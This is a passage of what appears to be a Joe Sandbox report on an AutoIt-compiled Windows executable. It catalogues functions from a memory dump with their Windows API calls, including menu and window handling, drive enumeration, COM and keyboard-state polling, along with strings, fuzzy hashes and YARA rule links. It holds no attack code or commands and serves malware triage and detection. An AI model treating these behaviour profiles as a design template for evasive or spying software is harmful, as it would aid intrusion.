Opcode ID: bcc1f5f855fa5b58727450185a03971795ff27ab240f31f6be9f0e94d803a39c
Instruction ID: ef2bb234ad778371ce9fad231d8cf068df659fcf91705e59802551cb2a1ea324
Opcode Fuzzy Hash: bcc1f5f855fa5b58727450185a03971795ff27ab240f31f6be9f0e94d803a39c
Instruction Fuzzy Hash: 8D51DA3890478429FB35DBB08415BAABFB49F01381F18459DCDD2971C3DA649BCCCBA9

Function 00C4CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C4CE1C
GetWindowRect.USER32(00000000,?), ref: 00C4CE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C4CE8C
GetDlgItem.USER32(?,00000002), ref: 00C4CE97
GetWindowRect.USER32(00000000,?), ref: 00C4CEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C4CEFD
GetDlgItem.USER32(?,000003E9), ref: 00C4CF0B
GetWindowRect.USER32(00000000,?), ref: 00C4CF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C4CF5F
GetDlgItem.USER32(?,000003EA), ref: 00C4CF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C4CF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 00C4CF97

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: bb5c17b7977113f57cb710e9ebd2016147115ce42fbffb1f096a9512dea7906c
Instruction ID: a0cfb86c51a98b2408a2a6be0cee1364ded439b0916249b8e17fd09e0b4be6ac
Opcode Fuzzy Hash: bb5c17b7977113f57cb710e9ebd2016147115ce42fbffb1f096a9512dea7906c
Instruction Fuzzy Hash: 3C514071B00205AFDB58CFA9CD89BAEBBB6FB88710F14812DF915D7290D770AE048B54

Function 00BF23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF2412,?,00000000,?,?,?,?,00BF1AA7,00000000,?), ref: 00BF1F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BF24AF
KillTimer.USER32(-00000001,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00BF254A
DestroyAcceleratorTable.USER32(00000000), ref: 00C2BFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00C2C018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00C2C02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00C2C04B
DeleteObject.GDI32(00000000), ref: 00C2C05D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: c8a7dd46a21bee8090b44c3ad4be2df3023e72f2720770a3c34509c802299dad
Instruction ID: 7772e6ecb5c8d1d1e62f32f08c1a97c4d664e015cb3a68e25debfde3fca7c6d0
Opcode Fuzzy Hash: c8a7dd46a21bee8090b44c3ad4be2df3023e72f2720770a3c34509c802299dad
Instruction Fuzzy Hash: D561BE30104618DFDB259F14D988B3E77F1FF84312F208698EA5667AA0C7B1AC98DF95

Function 00BF2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00BF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BF29BC

GetSysColor.USER32(0000000F), ref: 00BF25AF

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: fe90e66415ab00516d1a1a954b7903b88551d81187a0fcfa6fb2906023bdc2d1
Instruction ID: ff57d3f6fd3227e25d489daa29c580645090b3199ec4f774435a0c02cd4e473f
Opcode Fuzzy Hash: fe90e66415ab00516d1a1a954b7903b88551d81187a0fcfa6fb2906023bdc2d1
Instruction Fuzzy Hash: DF41B431004158AFDB259F689888BBD3BA5EB0A331F2542A5FE658B1E1D7308D45EB25

Function 00C029BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00C10B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C02A3E,?,00008000), ref: 00C10BA7

Part of subcall function 00C10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C02A58,?,00008000), ref: 00C102A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C02ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00C02C2C

Part of subcall function 00C03EBE: _wcscpy.LIBCMT ref: 00C03EF6

Part of subcall function 00C1386D: _iswctype.LIBCMT ref: 00C13875

Strings

Error opening the file, xrefs: 00C3FD33, 00C3FDAA
AU3!, xrefs: 00C02A93
EA06, xrefs: 00C3FD48
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00C3FD17
Unterminated string, xrefs: 00C400D6
Bad directive syntax error, xrefs: 00C4008F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: 938005bb104ab8a3843d5c8b6157ef133397a17b19b0c20f6f0e6b87339a10ba
Instruction ID: ade055ac0fc298fd305b0753069e61a985b249cfbbde2c5083b6bea638743b87
Opcode Fuzzy Hash: 938005bb104ab8a3843d5c8b6157ef133397a17b19b0c20f6f0e6b87339a10ba
Instruction Fuzzy Hash: 7B02D5705083419FC724EF24C891AAFBBE5FF89314F14091DF599932A2DB30DA49EB42

Function 00C5AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00C80980), ref: 00C5AF4E
GetDriveTypeW.KERNEL32(00000061,00CAB5F0,00000061), ref: 00C5B018
_wcscpy.LIBCMT ref: 00C5B042

Strings

ramdisk, xrefs: 00C5AFC2
all, xrefs: 00C5AF54
cdrom, xrefs: 00C5AF6A
network, xrefs: 00C5AFAC
unknown, xrefs: 00C5AFD9
fixed, xrefs: 00C5AF96
removable, xrefs: 00C5AF80

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: fe16106eabb8be47aca9e9227bc127d83d8e1d6a8e76a91a9525bd4c72f2848b
Instruction ID: 0f13d12c39272e4a75ba8da1a631e2026f2214716a8dbf387873453ad5c12df1
Opcode Fuzzy Hash: fe16106eabb8be47aca9e9227bc127d83d8e1d6a8e76a91a9525bd4c72f2848b
Instruction Fuzzy Hash: E451DC741083059BC710EF55C891AAFB7E4FF91305F204A29F996472E2EB70AE8DDB46

Function 00BF4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00BF4D62
__swprintf.LIBCMT ref: 00BF4DAC
__i64tow.LIBCMT ref: 00C2DB3B

Strings

False, xrefs: 00C2DB03
0x%p, xrefs: 00C2DB1D
%.15g, xrefs: 00BF4DA6
True, xrefs: 00C2DAFC

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 69cb3925e108f51c2b5c33cc1a5cfd78913c2438267b29b25f818788a7324a02
Instruction ID: a795cf471c31bfc35fd6c3921b507c300e7bc0cbcaea431bc22c1e5da66d4706
Opcode Fuzzy Hash: 69cb3925e108f51c2b5c33cc1a5cfd78913c2438267b29b25f818788a7324a02
Instruction Fuzzy Hash: AB41F775604209AFDB34DF74D842EBA73E8EB55300F2044AEF54AD7292EB719E46E710

Function 00C77777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C7778F
CreateMenu.USER32 ref: 00C777AA
SetMenu.USER32(?,00000000), ref: 00C777B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C77846
IsMenu.USER32(?), ref: 00C7785C
CreatePopupMenu.USER32 ref: 00C77866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C77893
DrawMenuBar.USER32 ref: 00C7789B

Strings

0, xrefs: 00C77785
F, xrefs: 00C77887

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 7c4380ed2a692c9b83ff4a6e7c616e66b80892155792c35b66fe5bbd9bc66031
Instruction ID: b9e7f8bd0ad10cc11c31948a6429d556e33caea092bfa6aac661658a2feb3305
Opcode Fuzzy Hash: 7c4380ed2a692c9b83ff4a6e7c616e66b80892155792c35b66fe5bbd9bc66031
Instruction Fuzzy Hash: C9414574A00209EFDB10DF64D888B9ABBB5FF49300F154228E919A73A0C731AA14CF64

Function 00C77AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C77B83
CreateCompatibleDC.GDI32(00000000), ref: 00C77B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C77B9D
SelectObject.GDI32(00000000,00000000), ref: 00C77BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C77BB0
DeleteDC.GDI32(00000000), ref: 00C77BB9
GetWindowLongW.USER32(?,000000EC), ref: 00C77BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C77BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C77BE3

Strings

static, xrefs: 00C77B1B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: f54a83af7e5fc0f738cec6cb2d4fef5259b025a86aee22fa73a89663656fc81a
Instruction ID: b2466d69c970d5cf49970698712f68a681f56eb8d3017766154a1028144aa135
Opcode Fuzzy Hash: f54a83af7e5fc0f738cec6cb2d4fef5259b025a86aee22fa73a89663656fc81a
Instruction Fuzzy Hash: DC316B32104219ABDF129FA4DC49FDF3B69FF09320F214315FA69A61A0C771D924DBA8

Function 00C17030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C1706B

Part of subcall function 00C18D58: __getptd_noexit.LIBCMT ref: 00C18D58

__gmtime64_s.LIBCMT ref: 00C17104
__gmtime64_s.LIBCMT ref: 00C1713A
__gmtime64_s.LIBCMT ref: 00C17157
__allrem.LIBCMT ref: 00C171AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C171C9
__allrem.LIBCMT ref: 00C171E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C171FE
__allrem.LIBCMT ref: 00C17215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C17233
__invoke_watson.LIBCMT ref: 00C172A4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: 3ac57a5229803406214fa8b040a5a08530ccd10b4f4c16f7a9a31871727e8ccd
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 87712871A04717EBD7149F79DC41BDAB3B8AF16320F14432AF524E7681E770DA81AB90

Function 00C52CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C52CE9
GetMenuItemInfoW.USER32(00CB7890,000000FF,00000000,00000030), ref: 00C52D4A
SetMenuItemInfoW.USER32(00CB7890,00000004,00000000,00000030), ref: 00C52D80
Sleep.KERNEL32(000001F4), ref: 00C52D92
GetMenuItemCount.USER32(?), ref: 00C52DD6
GetMenuItemID.USER32(?,00000000), ref: 00C52DF2
GetMenuItemID.USER32(?,-00000001), ref: 00C52E1C
GetMenuItemID.USER32(?,?), ref: 00C52E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C52EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C52EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C52EDC

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 63911d6fb6b3d5333e44d4db603c40896516a610b8b500d5334134b20782faa9
Instruction ID: b405115f74905f9fa27bf7aa45be60700442783decd16016c7dc6832ed699e51
Opcode Fuzzy Hash: 63911d6fb6b3d5333e44d4db603c40896516a610b8b500d5334134b20782faa9
Instruction Fuzzy Hash: AA61A078900249AFDB11CF64CC89ABEBBF8EB42307F140159FC51A7251D771AE89DB29

Function 00C77548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C775CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C775CD
GetWindowLongW.USER32(?,000000F0), ref: 00C775F1
_memset.LIBCMT ref: 00C77602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C77614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C7768C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 74cbdbbe7da215f4a43a5e1a46e11c61e3b244d6bbe682f5f8f4120c1ef40c3e
Instruction ID: d4f25fbfd0d517c40b79548b6b969b1fc86aadc99b490515dbb8f1f069820dbf
Opcode Fuzzy Hash: 74cbdbbe7da215f4a43a5e1a46e11c61e3b244d6bbe682f5f8f4120c1ef40c3e
Instruction Fuzzy Hash: 8A617C75904208AFDB11DFA4CC85FEE77F8EB49710F104299FA18A72A1D771AE41DB60

Function 00C477B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C477DD
SafeArrayAllocData.OLEAUT32(?), ref: 00C47836
VariantInit.OLEAUT32(?), ref: 00C47848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C47868
VariantCopy.OLEAUT32(?,?), ref: 00C478BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C478CF
VariantClear.OLEAUT32(?), ref: 00C478E4
SafeArrayDestroyData.OLEAUT32(?), ref: 00C478F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C478FA
VariantClear.OLEAUT32(?), ref: 00C4790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C47917

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 03666b58a8d834147fa0c9b3e04a39c4c93dbbf5f4e9daea86a67e42f100b491
Instruction ID: 0736a9206eeccb2380c56e4af4c15ae80f9b3cfcfcaa092e34890117e48b2f6b
Opcode Fuzzy Hash: 03666b58a8d834147fa0c9b3e04a39c4c93dbbf5f4e9daea86a67e42f100b491
Instruction Fuzzy Hash: C0415335A002199FDB00DFA4D848EADBBB9FF48354F108169EA55A7261C730EA49CFA4

Function 00C50508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C50530
GetAsyncKeyState.USER32(000000A0), ref: 00C505B1
GetKeyState.USER32(000000A0), ref: 00C505CC
GetAsyncKeyState.USER32(000000A1), ref: 00C505E6
GetKeyState.USER32(000000A1), ref: 00C505FB
GetAsyncKeyState.USER32(00000011), ref: 00C50613
GetKeyState.USER32(00000011), ref: 00C50625
GetAsyncKeyState.USER32(00000012), ref: 00C5063D
GetKeyState.USER32(00000012), ref: 00C5064F
GetAsyncKeyState.USER32(0000005B), ref: 00C50667
GetKeyState.USER32(0000005B), ref: 00C50679

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 718786e4722df8ae324a531620a16a01648f0f4424a1d6210ae2783e412bd771
Instruction ID: 0a62f42b80ce758ad2d05269037f6dc720ebabd8666a27d3c2de14268913cdfe
Opcode Fuzzy Hash: 718786e4722df8ae324a531620a16a01648f0f4424a1d6210ae2783e412bd771
Instruction Fuzzy Hash: CB41B6385047CA6DFF70866488043B5BEA06F51305F684059EDD5C75C2EAA49BDCCFAE

Function 00C68AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

CoInitialize.OLE32 ref: 00C68AED
CoUninitialize.OLE32 ref: 00C68AF8
CoCreateInstance.OLE32(?,00000000,00000017,00C83BBC,?), ref: 00C68B58
IIDFromString.OLE32(?,?), ref: 00C68BCB
VariantInit.OLEAUT32(?), ref: 00C68C65
VariantClear.OLEAUT32(?), ref: 00C68CC6

Strings

Invalid parameter, xrefs: 00C68BE4
NULL Pointer assignment, xrefs: 00C68B9D
Failed to create object, xrefs: 00C68B63, 00C68C19

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 57a42f69272a7088ce5dc62fd388d262195ae914146d1c0d13f0a85595667ac6
Instruction ID: 430c5996a4dfc32068f6c8d44cf97bb7c25cc93c0fb9cc7c40793c6e598072d6
Opcode Fuzzy Hash: 57a42f69272a7088ce5dc62fd388d262195ae914146d1c0d13f0a85595667ac6
Instruction Fuzzy Hash: B8618070208711AFC720DF54C889F6EB7E4AF85714F100959F9959B291CB70EE8CCBA6

Function 00C5BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C5BB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C5BB89
GetLastError.KERNEL32 ref: 00C5BB93
SetErrorMode.KERNEL32(00000000,READY), ref: 00C5BC00

Strings

READY, xrefs: 00C5BBD9
UNKNOWN, xrefs: 00C5BBB8
NOTREADY, xrefs: 00C5BBBF
